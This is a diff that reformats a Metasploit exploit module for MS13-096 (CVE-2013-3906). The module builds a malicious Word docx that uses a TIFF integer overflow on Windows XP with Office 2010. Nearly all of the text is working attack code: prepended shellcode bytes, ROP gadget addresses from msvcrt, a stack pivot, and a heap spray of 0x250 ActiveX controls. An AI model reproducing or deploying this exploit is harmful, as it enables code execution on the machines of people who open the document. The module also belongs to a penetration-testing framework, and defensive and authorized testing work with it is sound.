@@ -7,22 +7,21 @@ require 'rex/zip'
 require 'nokogiri'
 
 module ::Nokogiri
-module XML
-  class Builder
-    #
-    # Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
-    # So here's our hack to get around that by adding a new custom method to the Builder class
-    #
-    def custom_root(ns)
-      e = @parent.create_element(ns)
-      e.add_namespace_definition(ns, "href")
-      @ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
-      return self
+  module XML
+    class Builder
+      #
+      # Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
+      # So here's our hack to get around that by adding a new custom method to the Builder class
+      #
+      def custom_root(ns)
+        e = @parent.create_element(ns)
+        e.add_namespace_definition(ns, "href")
+        @ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
+        return self
+      end
     end
   end
 end
-end
-
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = AverageRanking
@@ -30,10 +29,12 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::RopDb
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow",
-      'Description'    => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow",
+        'Description' => %q{
           This module exploits a vulnerability found in Microsoft's Tagged Image File Format.
           It was originally discovered in the wild, targeting Windows XP and Windows Server 2003
           users running Microsoft Office, specifically in the Middle East and South Asia region.
@@ -51,47 +52,50 @@ class MetasploitModule < Msf::Exploit::Remote
           memory layout using ActiveX, it is possible to gain arbitrary code execution under the
           context of the user.
         },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it
-          'sinn3r'   # Metasploit
+          'sinn3r' # Metasploit
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2013-3906' ],
           [ 'MSB', 'MS13-096' ],
           [ 'OSVDB', '99376' ],
           [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ],
           [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ]
         ],
-      'Payload'        =>
-        {
+        'Payload' => {
           'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
-                              "\x83\xC0\x08"             + # add eax, byte 8
-                              "\x8b\x20"                 + # mov esp, [eax]
-                              "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
-          'BadChars'       => "\x00"
+                                    "\x83\xC0\x08" + # add eax, byte 8
+                                    "\x8b\x20" + # mov esp, [eax]
+                                    "\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000
+          'BadChars' => "\x00"
         },
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
           'PrependMigrate' => true
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
           ['Windows XP SP3 with Office Standard 2010', {}],
         ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2013-11-05', # Microsoft announcement
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2013-11-05', # Microsoft announcement
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
-      register_options(
-        [
-          OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
-        ])
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
+      ]
+    )
   end
 
   #
@@ -139,21 +143,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Gain control of the call [eax+50h] instruction
     # XCHG EAX, ESP; RETN msvcrt
-    buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
+    buf[0x4874, 4] = [0x200F0700 - 0x50].pack('V')
 
     buf
   end
 
-
   #
   # Generates a payload
   #
   def get_rop_payload
     p = ''
     p << [0x77c15ed5].pack('V') # XCHG EAX, ESP  msvcrt
-    p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
+    p << generate_rop_payload('msvcrt', '', { 'target' => 'xp' })
     p << payload.encoded
-    block  = p
+    block = p
     block << rand_text_alpha(1024 - 80 - p.length)
     block << [ 0x77c34fbf, 0x200f0704 ].pack("V*") # pop esp # ret # from msvcrt
     block << rand_text_alpha(1024 - block.length)
@@ -166,7 +169,6 @@ class MetasploitModule < Msf::Exploit::Remote
     buf
   end
 
-
   #
   # Creates an ActiveX bin that will be used as a spray in Office
   #
@@ -178,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # http://www.openoffice.org/sc/compdocfileformat.pdf
 
     # The bin file
-    mscd  = ''
+    mscd = ''
     mscd << [0xe011cfd0].pack('V')      # File identifier (first 4 byte)
     mscd << [0xe11ab1a1].pack('V')      # File identifier (second 4 byte)
     mscd << [0x00000000].pack('V') * 4  # Unique Identifier
@@ -198,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Remote
     mscd << [0x00000000].pack('V')      # Total number of sectors for master sector talbe
     mscd << [0x00000000].pack('V')      # SecIDs
     mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
-    mscd[0x200, 4]  = [0xfffffffd].pack('V')
+    mscd[0x200, 4] = [0xfffffffd].pack('V')
     mscd[0x204, 12] = [0xfffffffe].pack('V') * 3
     mscd << Rex::Text.to_unicode("Root Entry")
     mscd << [0x00000000].pack('V') * 11
@@ -233,7 +235,7 @@ class MetasploitModule < Msf::Exploit::Remote
     mscd << [0x00000002].pack('V')
     mscd << [0x00000003].pack('V')
     mscd << [0xfffffffe].pack('V')
-    mscd << [0xffffffff].pack('V') * 32 #52
+    mscd << [0xffffffff].pack('V') * 32 # 52
     mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
     mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
     mscd << [0xffffffff].pack('V') * 18
@@ -242,7 +244,6 @@ class MetasploitModule < Msf::Exploit::Remote
     mscd
   end
 
-
   #
   # Creates an activeX[num].xml file
   # @param rid [String] The relationship ID (example: rId1)
@@ -250,12 +251,12 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def make_activex_xml(rid)
     attrs = {
-      'ax:classid'     => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
-      'ax:license'     => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
+      'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
+      'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
       'ax:persistence' => "persistStorage",
-      'r:id'           => "rId#{rid.to_s}",
-      'xmlns:ax'       => "http://schemas.microsoft.com/office/2006/activeX",
-      'xmlns:r'        => @schema
+      'r:id' => "rId#{rid.to_s}",
+      'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
+      'xmlns:r' => @schema
     }
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@@ -266,7 +267,6 @@ class MetasploitModule < Msf::Exploit::Remote
     builder.to_xml(:indent => 0)
   end
 
-
   #
   # Creates an activeX[num].xml.rels
   # @param relationships [Array] A collection of hashes with each containing:
@@ -277,9 +277,9 @@ class MetasploitModule < Msf::Exploit::Remote
     acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
-        xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
-    end
+      xml.Relationships('xmlns' => "http://schemas.openxmlformats.org/package/2006/relationships") do
+        xml.Relationship({ :Id => "rId#{rid.to_s}", :Type => acx_type, :Target => target_bin })
+      end
     end
 
     builder.to_xml(:indent => 0)
@@ -294,17 +294,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def make_doc_xml_reals(relationships)
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
-      relationships.each do |r|
-        xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
+      xml.Relationships('xmlns' => "http://schemas.openxmlformats.org/package/2006/relationships") do
+        relationships.each do |r|
+          xml.Relationship({ :Id => "rId#{r[:id].to_s}", :Type => r[:type], :Target => r[:target] })
+        end
       end
     end
-    end
 
     builder.to_xml(:indent => 0)
   end
 
-
   #
   # Creates a _rels/.rels file
   #
@@ -316,20 +315,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
-      rels.each do |r|
-        xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
+      xml.Relationships('xmlns' => "http://schemas.openxmlformats.org/package/2006/relationships") do
+        rels.each do |r|
+          xml.Relationship({ :Id => "rId#{r[:id].to_s}", :Type => r[:type], :Target => r[:fname].gsub(/^\//, '') })
+        end
       end
     end
-    end
 
     {
       :fname => "_rels/.rels",
-      :data  => builder.to_xml(:indent => 0)
+      :data => builder.to_xml(:indent => 0)
     }
   end
 
-
   #
   # Creates a run element for chart
   # @param xml [Element]
@@ -341,19 +339,19 @@ class MetasploitModule < Msf::Exploit::Remote
     xml.r do
       xml.rPr do
         xml.noProof
-        xml.lang({'w:val' => "en-US"})
+        xml.lang({ 'w:val' => "en-US" })
       end
 
       xml.drawing do
-        xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
-          xml['wp'].extent({'cx'=>'1', 'cy'=>'1'})
-          xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
-          xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
+        xml['wp'].inline({ 'distT' => "0", 'distB' => "0", 'distL' => "0", 'distR' => "0" }) do
+          xml['wp'].extent({ 'cx' => '1', 'cy' => '1' })
+          xml['wp'].effectExtent({ 'l' => "1", 't' => "0", 'r' => "1", 'b' => "0" })
+          xml['wp'].docPr({ 'id' => rid.to_s, 'name' => "drawing #{rid.to_s}" })
           xml['wp'].cNvGraphicFramePr
 
           xml['a'].graphic do
-            xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
-              xml['c'].chart({'r:id'=>"rId#{rid.to_s}"})
+            xml['a'].graphicData({ 'uri' => "#{drawingml_schema}/chart" }) do
+              xml['c'].chart({ 'r:id' => "rId#{rid.to_s}" })
             end
           end
         end
@@ -361,7 +359,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   #
   # Creates a run element for ax
   # @param xml [Element]
@@ -369,27 +366,26 @@ class MetasploitModule < Msf::Exploit::Remote
   #
   def create_ax_run_element(xml, rid)
     shape_attrs = {
-      'id'    => "_x0000_i10#{rid.to_s}",
-      'type'  => "#_x0000_t75",
+      'id' => "_x0000_i10#{rid.to_s}",
+      'type' => "#_x0000_t75",
       'style' => "width:1pt;height:1pt",
       'o:ole' => ""
     }
 
     control_attrs = {
-      'r:id'      => "rId#{rid.to_s}",
-      'w:name'    => "TabStrip#{rid.to_s}",
-      'w:shapeid' =>"_x0000_i10#{rid.to_s}"
+      'r:id' => "rId#{rid.to_s}",
+      'w:name' => "TabStrip#{rid.to_s}",
+      'w:shapeid' => "_x0000_i10#{rid.to_s}"
     }
 
     xml.r do
-      xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
+      xml.object({ 'w:dxaOrig' => "1440", 'w:dyaOrig' => "1440" }) do
         xml['v'].shape(shape_attrs)
         xml['w'].control(control_attrs)
       end
     end
   end
 
-
   #
   # Creates a pic run element
   # @param xml [Element]
@@ -401,28 +397,28 @@ class MetasploitModule < Msf::Exploit::Remote
     xml.r do
       xml.rPr do
         xml.noProof
-        xml.lang({'w:val'=>"en-US"})
+        xml.lang({ 'w:val' => "en-US" })
       end
 
       xml.drawing do
-        xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
-          xml.extent({'cx'=>'1', 'cy'=>'1'})
-          xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
-          xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
+        xml['wp'].inline({ 'distT' => "0", 'distB' => "0", 'distL' => "0", 'distR' => "0" }) do
+          xml.extent({ 'cx' => '1', 'cy' => '1' })
+          xml['wp'].effectExtent({ 'l' => "1", 't' => "0", 'r' => "0", 'b' => "0" })
+          xml['wp'].docPr({ 'id' => rid.to_s, 'name' => "image", 'descr' => "image.jpeg" })
           xml['wp'].cNvGraphicFramePr do
-            xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})
+            xml['a'].graphicFrameLocks({ 'xmlns:a' => "#{drawinxml_schema}/main", 'noChangeAspect' => "1" })
           end
 
-          xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do
-            xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do
-              xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do
+          xml['a'].graphic({ 'xmlns:a' => "#{drawinxml_schema}/main" }) do
+            xml['a'].graphicData({ 'uri' => "#{drawinxml_schema}/picture" }) do
+              xml['pic'].pic({ 'xmlns:pic' => "#{drawinxml_schema}/picture" }) do
                 xml['pic'].nvPicPr do
-                  xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"})
+                  xml['pic'].cNvPr({ 'id' => rid.to_s, 'name' => "image.jpeg" })
                   xml['pic'].cNvPicPr
                 end
 
                 xml['pic'].blipFill do
-                  xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print")
+                  xml['a'].blip('r:embed' => "rId#{rid.to_s}", 'cstate' => "print")
                   xml['a'].stretch do
                     xml['a'].fillRect
                   end
@@ -430,11 +426,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
                 xml['pic'].spPr do
                   xml['a'].xfrm do
-                    xml['a'].off({'x'=>"0", 'y'=>"0"})
-                    xml['a'].ext({'cx'=>"1", 'cy'=>"1"})
+                    xml['a'].off({ 'x' => "0", 'y' => "0" })
+                    xml['a'].ext({ 'cx' => "1", 'cy' => "1" })
                   end
 
-                  xml['a'].prstGeom({'prst' => "rect"}) do
+                  xml['a'].prstGeom({ 'prst' => "rect" }) do
                     xml['a'].avLst
                   end
                 end
@@ -446,7 +442,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   #
   # Creates a document.xml file
   # @param pre_defs [Array]
@@ -457,7 +452,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
     # Get all the required pre-defs
     chart_rids = []
-    pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
+    pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\// }
 
     # Get all the ActiveX RIDs
     ax_rids = []
@@ -469,21 +464,21 @@ class MetasploitModule < Msf::Exploit::Remote
     # Documentation on how this is crafted:
     # http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
     doc_attrs = {
-      'xmlns:ve'  => "http://schemas.openxmlformats.org/markup-compatibility/2006",
-      'xmlns:o'   => "urn:schemas-microsoft-com:office:office",
-      'xmlns:r'   => @schema,
-      'xmlns:m'   => "http://schemas.openxmlformats.org/officeDocument/2006/math",
-      'xmlns:v'   => "urn:schemas-microsoft-com:vml",
-      'xmlns:wp'  => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
+      'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
+      'xmlns:o' => "urn:schemas-microsoft-com:office:office",
+      'xmlns:r' => @schema,
+      'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
+      'xmlns:v' => "urn:schemas-microsoft-com:vml",
+      'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
       'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
-      'xmlns:w'   => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
+      'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
       'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
-      'xmlns:a'   => "http://schemas.openxmlformats.org/drawingml/2006/main",
-      'xmlns:c'   => "http://schemas.openxmlformats.org/drawingml/2006/chart"
+      'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main",
+      'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart"
     }
 
-    p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
-    p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
+    p_attrs_1 = { 'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
+    p_attrs_2 = { 'w:rsidR' => "00D15BD0", 'w:rsidRPr' => "00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@@ -497,7 +492,7 @@ class MetasploitModule < Msf::Exploit::Remote
             xml.pPr do
               # Run properties
               xml.rPr do
-                xml.lang({'w:val' => "en-US"})
+                xml.lang({ 'w:val' => "en-US" })
               end
             end
 
@@ -509,7 +504,7 @@ class MetasploitModule < Msf::Exploit::Remote
           xml.p(p_attrs_2) do
             xml.pPr do
               xml.rPr do
-                xml['w'].lang({'w:val'=>"en-US"})
+                xml['w'].lang({ 'w:val' => "en-US" })
               end
             end
 
@@ -526,11 +521,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     {
-      :id           => (last_rid + 1).to_s,
-      :type         => "#{@schema}/officeDocument",
-      :fname        => "/word/document.xml",
+      :id => (last_rid + 1).to_s,
+      :type => "#{@schema}/officeDocument",
+      :fname => "/word/document.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
-      :xml          => builder.to_xml(:indent => 0)
+      :xml => builder.to_xml(:indent => 0)
     }
   end
 
@@ -543,159 +538,156 @@ class MetasploitModule < Msf::Exploit::Remote
   def make_contenttype_xml(overrides)
     contenttypes = [
       {
-        :Extension   => "rels",
+        :Extension => "rels",
         :ContentType => "application/vnd.openxmlformats-package.relationships+xml"
       },
       {
-        :Extension   => "xml",
+        :Extension => "xml",
         :ContentType => "application/xml"
       },
       {
-        :Extension   => "jpeg",
+        :Extension => "jpeg",
         :ContentType => "image/jpeg"
       },
       {
-        :Extension   => "bin",
+        :Extension => "bin",
         :ContentType => "application/vnd.ms-office.activeX"
       },
       {
-        :Extension  => "xlsx",
+        :Extension => "xlsx",
         :ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
       }
     ]
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
-      # Default extensions
-      contenttypes.each do |contenttype|
-        xml.Default(contenttype)
-      end
+      xml.Types({ 'xmlns' => "http://schemas.openxmlformats.org/package/2006/content-types" }) do
+        # Default extensions
+        contenttypes.each do |contenttype|
+          xml.Default(contenttype)
+        end
 
-      # Additional overrides
-      overrides.each do |override|
-        override_attrs = {
-          :PartName    => override[:PartName] || override[:fname],
-          :ContentType => override[:ContentType]
-        }
-        xml.Override(override_attrs)
+        # Additional overrides
+        overrides.each do |override|
+          override_attrs = {
+            :PartName => override[:PartName] || override[:fname],
+            :ContentType => override[:ContentType]
+          }
+          xml.Override(override_attrs)
+        end
       end
     end
-    end
 
     builder.to_xml(:indent => 0)
   end
 
-
   #
   # Pre-define some items that will be used in .rels
   #
   def init_doc_props(last_rid)
     items = []
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/extended-properties",
-      :fname        => "/docProps/app.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/extended-properties",
+      :fname => "/docProps/app.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties",
-      :fname        => "/docProps/core.xml",
+      :id => (last_rid += 1),
+      :type => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties",
+      :fname => "/docProps/core.xml",
       :content_type => "application/vnd.openxmlformats-package.core-properties+xml"
     }
 
     return last_rid, items
   end
 
-
   #
   # Pre-define some items that will be used in document.xml.rels
   #
   def init_doc_xml_rels_items(last_rid)
     items = []
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/styles",
-      :fname        => "/word/styles.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/styles",
+      :fname => "/word/styles.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/settings",
-      :fname        => "/word/settings.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/settings",
+      :fname => "/word/settings.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/webSettings",
-      :fname        => "/word/webSettings.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/webSettings",
+      :fname => "/word/webSettings.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/fontTable",
-      :fname        => "/word/fontTable.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/fontTable",
+      :fname => "/word/fontTable.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/theme",
-      :fname        => "/word/theme/theme1.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/theme",
+      :fname => "/word/theme/theme1.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/chart",
-      :fname        => "/word/charts/chart1.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/chart",
+      :fname => "/word/charts/chart1.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/chart",
-      :fname        => "/word/charts/chart2.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/chart",
+      :fname => "/word/charts/chart2.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/chart",
-      :fname        => "/word/charts/chart3.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/chart",
+      :fname => "/word/charts/chart3.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/chart",
-      :fname        => "/word/charts/chart4.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/chart",
+      :fname => "/word/charts/chart4.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/chart",
-      :fname        => "/word/charts/chart5.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/chart",
+      :fname => "/word/charts/chart5.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
     }
 
     items << {
-      :id           => (last_rid += 1),
-      :type         => "#{@schema}/chart",
-      :fname        => "/word/charts/chart6.xml",
+      :id => (last_rid += 1),
+      :type => "#{@schema}/chart",
+      :fname => "/word/charts/chart6.xml",
       :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
     }
 
     return last_rid, items
   end
 
-
   #
   # Manually create everything manually in the ActiveX directory
   #
@@ -705,12 +697,12 @@ class MetasploitModule < Msf::Exploit::Remote
     0x250.times do |i|
       id = (last_rid += 1)
 
-      bin  = {
+      bin = {
         :fname => "/word/activeX/activeX#{id.to_s}.bin",
         :bin => make_activex_bin
       }
 
-      xml  = {
+      xml = {
         :fname => "/word/activeX/activeX#{id.to_s}.xml",
         :xml => make_activex_xml(id)
       }
@@ -720,23 +712,22 @@ class MetasploitModule < Msf::Exploit::Remote
         :rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
       }
 
-      ct   = "application/vnd.ms-office.activeX+xml"
+      ct = "application/vnd.ms-office.activeX+xml"
       type = "#{@schema}/control"
 
       activex << {
-        :id           => id,
-        :bin          => bin,
-        :xml          => xml,
-        :rels         => rels,
+        :id => id,
+        :bin => bin,
+        :xml => xml,
+        :rels => rels,
         :content_type => ct,
-        :type         => type
+        :type => type
       }
     end
 
     return last_rid, activex
   end
 
-
   #
   # Create a [Content_Types.xml], each node contains these attributes:
   # :PartName     The path to an ActiveX XML file
@@ -746,24 +737,23 @@ class MetasploitModule < Msf::Exploit::Remote
     overrides = []
     items.each do |item|
       item.each do |obj|
-        overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
+        overrides << { :PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type] }
       end
     end
 
-    {:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
+    { :fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides) }
   end
 
-
   #
   # Creates the tiff file
   #
   def init_tiff_file(last_rid)
     id = last_rid + 1
     tiff_data = {
-      :id   => id,
+      :id => id,
       :fname => "/word/media/image1.jpeg",
-      :data  => make_tiff,
-      :type  => "#{@schema}/image"
+      :data => make_tiff,
+      :type => "#{@schema}/image"
     }
 
     return id, tiff_data
@@ -775,16 +765,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def init_doc_xml_reals_file(pre_defs, activex, tiff)
     reals = []
     pre_defs.each do |obj|
-      reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
+      reals << { :id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '') }
     end
 
     activex.each do |obj|
-      reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
+      reals << { :id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '') }
     end
 
-    reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
+    reals << { :id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '') }
 
-    {:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
+    { :fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals) }
   end
 
   #
@@ -799,7 +789,6 @@ class MetasploitModule < Msf::Exploit::Remote
     buf
   end
 
-
   #
   # Packages everything to docx
   #
@@ -807,17 +796,17 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Initializing files...")
     last_rid = 0
     last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
-    last_rid, activex            = init_activex_files(last_rid)
-    last_rid, doc_props          = init_doc_props(last_rid)
-    last_rid, tiff_file          = init_tiff_file(last_rid)
-    doc_xml                      = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
-    ct_xml_file                  = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
-    doc_xml_reals_file           = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
-    rels_xml                     = init_rels(doc_xml, doc_props)
+    last_rid, activex = init_activex_files(last_rid)
+    last_rid, doc_props = init_doc_props(last_rid)
+    last_rid, tiff_file = init_tiff_file(last_rid)
+    doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
+    ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
+    doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
+    rels_xml = init_rels(doc_xml, doc_props)
 
     zip = Rex::Zip::Archive.new
     Dir["#{path}/**/**"].each do |file|
-      p = file.sub(path+'/','')
+      p = file.sub(path + '/', '')
 
       if File.directory?(file)
         print_status("Packing directory: #{p}")
